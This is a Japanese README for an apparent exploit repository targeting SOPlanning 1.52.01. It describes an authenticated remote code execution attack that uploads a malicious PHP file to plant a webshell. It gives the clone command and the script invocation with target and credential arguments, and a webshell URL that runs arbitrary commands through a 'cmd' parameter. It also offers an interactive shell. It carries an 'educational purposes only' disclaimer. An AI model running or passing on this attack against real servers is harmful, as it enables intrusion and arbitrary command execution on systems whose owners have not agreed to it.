
# SOPlanning 1.52.01(シンプルオンラインプランニングツール)用エクスプロイト - リモートコード実行(RCE)(認証済み)
このリポジトリには、SOPlanning バージョン 1.52.01 のリモートコード実行(RCE)脆弱性に対するエクスプロイトが含まれています。このエクスプロイトにより、認証済みユーザーが悪意のある PHP ファイルをアップロードし、サーバー上で任意のコマンドを実行できます。
requests ライブラリ(pip install requests でインストール)このリポジトリをクローンします:
git clone https://github.com/TheExploiters/SOPlanning-RCE-1.52.01.git
cd SOPlanning-RCE-1.52.01
エクスプロイトスクリプトを実行します:
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <target> -u <user> -p <pass>
http://example.com:9090 をターゲット URL に、admin をユーザー名に、admin をパスワードに置き換えてください。
実行が成功したら、ウェブシェルにアクセスします:
Access webshell here: http://example.com/upload/files/{link_id}/{php_filename}?cmd=<command>
対話型シェルを使用するには、プロンプトが表示されたら yes と応答します。
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <target> -u <user> -p <pass>
このエクスプロイトは Ardayfio Samuel Nii Aryee によって作成され、教育目的のみで提供されています。作成者およびリポジトリ所有者は、誤用や損害について一切の責任を負いません。このエクスプロイトをシステムでテストする前に、明示的な許可を得ていることを確認してください。